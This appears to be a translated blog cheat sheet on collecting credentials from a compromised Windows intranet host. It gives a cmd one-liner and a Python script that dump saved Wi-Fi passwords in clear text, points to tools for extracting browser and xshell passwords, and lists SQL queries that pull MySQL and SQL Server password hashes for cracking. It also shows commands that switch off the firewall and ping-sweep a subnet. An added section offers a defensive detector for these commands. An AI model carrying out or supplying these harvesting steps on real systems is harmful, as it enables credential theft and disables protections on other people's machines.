Intranet information collection supplement (Windows)

1. Get the passwords of the Wi-Fi networks the computer has connected to
1) cmd command

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do  @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

2) python script

# -*- coding: UTF-8 -*-
import os
import csv

# Get the names and passwords of all Wi-Fi networks this computer has connected to.
# The label strings matched below are the netsh output labels on a Chinese-locale Windows;
# on an English-locale system the labels are "All User Profile" and "Key Content",
# and the slice offsets differ.
def checkWIFI():
    wifi_list = []
    # Get all Wi-Fi profile names
    message = os.popen('netsh wlan show profiles').readlines()
    print('正在解析中,请稍等……')
    for i in message:
        result = i.strip().encode().decode("utf-8")

        if result.find(u"所有用户配置文件 : ") != -1:
            # The profile name starts after the 11-character label
            command = 'netsh wlan show profiles name="' + result[11:] + '" key=clear'
            try:
                per_wifi = os.popen(command).readlines()
            except OSError:
                per_wifi = []

            for j in per_wifi:
                passwd = j.strip().encode().decode("utf-8")

                if passwd.find(u"关键内容            :") != -1:
                    # Only record the entry when the password string is not empty
                    if passwd[18:] != '':
                        wifi_list.append([result[11:], passwd[18:]])
    return wifi_list

if __name__ == "__main__":
    wifi_list = checkWIFI()
    print("返回结果如下:")
    # Create the output directory if it does not exist yet
    os.makedirs('./Result', exist_ok=True)
    filename = './Result/conWifiInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        csv_writer.writerow(['ID', 'wifi名称', '密码'])
        i = 0
        for j in wifi_list:
            i = i + 1
            print(str(i) + "、wifi名称:" + j[0] + ",密码:" + j[1])
            csv_writer.writerow([i, j[0], j[1]])

2. Get the account password stored in the browser
2.1 LaZagne

One-click capture of all plaintext passwords on the target machine
https://github.com/AlessandroZ/LaZagne

2.2 Special tools

http://www.nirsoft.net/utils/web_browser_password.html  Firefox browser
http://www.nirsoft.net/utils/chromepass.html  Google Chrome browser

2.3 Python scripting

https://github.com/Potato-py/getIntrInfo

3. Obtain the account password for 3389 and xshell connection
3.1 AsteriskPassword:
An asterisk password viewer; it lets you view the * passwords saved in xshell, mysql and other databases

3.2 xshell, xftp password cracking:
https://github.com/dzxs/Xdecrypt

4. Get mysql account password

Run the following statement in the mysql database, then decrypt the result
select Host,User,Password,authentication_string from mysql.user;

5. Get the sqlserver account password

SELECT name,password_hash FROM master.sys.sql_logins;

6. Firewall operation

1) Check the firewall status

netsh firewall show config

2) Turn off the firewall

netsh firewall set opmode mode=disable 

7. ICMP scan for live hosts:

for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"
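
A defender-side view of the commands above, as an added example that is not part of the original post: it scans process-creation records (for instance Sysmon Event ID 1 or Security 4688 with command-line auditing) for the `netsh` invocations from sections 1 and 6 and for the per-host `ping` processes that the section 7 loop spawns. The event field names, the threshold of 20 and the sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns for the command lines shown on this page (netsh Wi-Fi key dump, firewall disable).
RULES = {
    "wifi_key_export": re.compile(
        r"netsh(?:\.exe)?\s+wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear", re.I),
    "firewall_disable": re.compile(
        r"netsh(?:\.exe)?\s+firewall\s+set\s+opmode\s+(?:mode\s*=\s*)?disable", re.I),
}
# ping with an IPv4 target: capture the /24 prefix and the last octet separately.
PING = re.compile(r"\bping(?:\.exe)?\b.*?\b(\d{1,3}\.\d{1,3}\.\d{1,3})\.(\d{1,3})\b", re.I)
SWEEP_THRESHOLD = 20  # assumption: distinct targets in one /24 from one parent process


def detect(events):
    """Return (rule, host, detail) tuples for process-creation events."""
    alerts = []
    sweep = defaultdict(set)  # (host, parent pid, /24 prefix) -> last octets pinged
    for ev in events:
        cmd = ev["cmdline"]
        for name, rx in RULES.items():
            if rx.search(cmd):
                alerts.append((name, ev["host"], cmd))
        m = PING.search(cmd)
        if m:
            sweep[(ev["host"], ev["ppid"], m.group(1))].add(m.group(2))
    for (host, ppid, net), targets in sweep.items():
        if len(targets) >= SWEEP_THRESHOLD:
            detail = f"{len(targets)} hosts in {net}.0/24 from parent pid {ppid}"
            alerts.append(("icmp_sweep", host, detail))
    return alerts


# Constructed sample events (host names, PIDs and the SSID are made up).
SAMPLE_EVENTS = (
    [{"host": "WS01", "ppid": 4120, "cmdline": f"ping  192.168.1.{i} -w 1 -n 1"}
     for i in range(1, 31)]
    + [
        {"host": "WS01", "ppid": 4120, "cmdline": 'netsh  wlan show profiles "CorpWiFi" key=clear'},
        {"host": "WS01", "ppid": 4120, "cmdline": "netsh firewall set opmode mode=disable"},
        {"host": "WS02", "ppid": 900, "cmdline": "netsh wlan show profiles"},
        {"host": "WS02", "ppid": 900, "cmdline": "ping 192.168.1.1 -n 4"},
    ]
)

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

A single ping and a plain profile listing, as on WS02 in the sample, produce no alert; only the `key=clear` form, the firewall disable and the many-target sweep do.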

Origin blog.csdn.net/qq_42383069/article/details/123703729